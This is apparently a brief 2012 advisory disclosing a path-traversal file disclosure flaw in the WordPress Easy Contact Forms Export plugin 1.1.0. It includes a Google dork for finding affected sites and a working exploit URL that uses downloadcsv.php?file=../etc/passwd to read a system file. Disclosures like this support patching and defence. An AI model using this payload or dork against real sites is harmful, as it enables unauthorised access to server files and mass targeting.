WordPress Easy Contact Forms Export plugin version 1.1.0 suffers from a remote file disclosure vulnerability.
431ade7667dc8fbf81b6cb4f979a99ae56d09f9f128a40d1b28f685f6bbe59c5
##################################################
# Description : Wordpress Plugins - Easy Contact Forms Export
Information Disclosure Vulnerability
# Version : 1.1.0
# Link : https://wordpress.org/extend/easy-contact-forms-exporter/
# Plugins :
https://downloads.wordpress.org/plugin/easy-contact-forms-exporter.zip
# Date : 26-05-2012
# Google Dork : inurl:/wp-content/plugins/easy-contact-forms-exporter/
# Author : Sammy FORGIT - sam at opensyscom dot fr -
https://www.opensyscom.fr
##################################################
Exploit :
https://www.exemple.com/wordpress/wp-content/plugins/easy-contact-forms-exporter/downloadcsv.php?file=../etc/passwd